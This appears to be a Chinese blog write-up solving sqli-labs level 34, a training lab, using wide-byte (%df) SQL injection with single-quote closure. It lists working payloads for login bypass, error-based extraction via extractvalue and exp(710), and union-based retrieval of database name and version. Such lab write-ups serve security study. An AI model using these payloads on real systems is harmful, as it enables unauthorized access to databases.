sqllab第三十四关通关笔记

知识点:

  • 宽字节注入+单引号闭合
  • 注意:不能直接在输入框进行宽字节注入,会被url编码,除非输入原始字符(%df已经是url编码了,直接输入会二次编码)
  • 错误注入
    • payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+
  • 联合注入
    • payload:username=1%df'union+select+database(),version()--+

通过抓包进行测试,发现是一个宽字节注入+单引号闭合

构造payload:username=1%df'or+1=1--+

成功显示出了id=1的用户信息

利用错误注入进行尝试

构造payload:username=1%df'or+exp(710)=1--+

界面成功回显了错误信息;说明可以进行错误注入

尝试读取数据库名

构造payload:username=1%df'or+extractvalue(1,concat(0x7e,database(),0x7e))=1--+

成功获取了数据库名;同样的可以获取数据库的其他信息

尝试进行联合注入

构造payload:username=1%df'union+select+1,2--+

输入内容成功显示到了屏幕上

利用联合注入获取数据库名和版本信息

构造payload:username=1%df'union+select+database(),version()--+

成功获取了数据库名和版本信息,同样手段可以获取数据库其他内容

10

相关推荐
YGY Webgis糕手之路3 小时前
OpenLayers 综合案例-轨迹回放
前端·经验分享·笔记·vue·web
遇见尚硅谷4 小时前
C语言:*p++与p++有何区别
c语言·开发语言·笔记·学习·算法
老虎06275 小时前
JavaWeb(苍穹外卖)--学习笔记13(微信小程序开发,缓存菜品,Spring Cache)
笔记·学习·微信小程序
YGY Webgis糕手之路8 小时前
OpenLayers 快速入门(九)Extent 介绍
前端·经验分享·笔记·vue·web
花月mmc8 小时前
CanMV-K230 AI学习笔记系列
人工智能·笔记·学习
努力自学的小夏10 小时前
RK3568 Linux驱动学习——Linux驱动开发准备工作
linux·驱动开发·笔记·学习
两颗泡腾片12 小时前
黑马程序员C++核心编程笔记--类和对象--运算符重载
c++·笔记
致***锌13 小时前
上证50ETF期权的交易时间是什么时候?
笔记
thginWalker13 小时前
图解网络-小林coding笔记(持续更新)
网络·笔记
草堂春睡足15 小时前
【Datawhale AI夏令营】科大讯飞AI大赛(大模型技术)/夏令营:让AI理解列车排期表
人工智能·笔记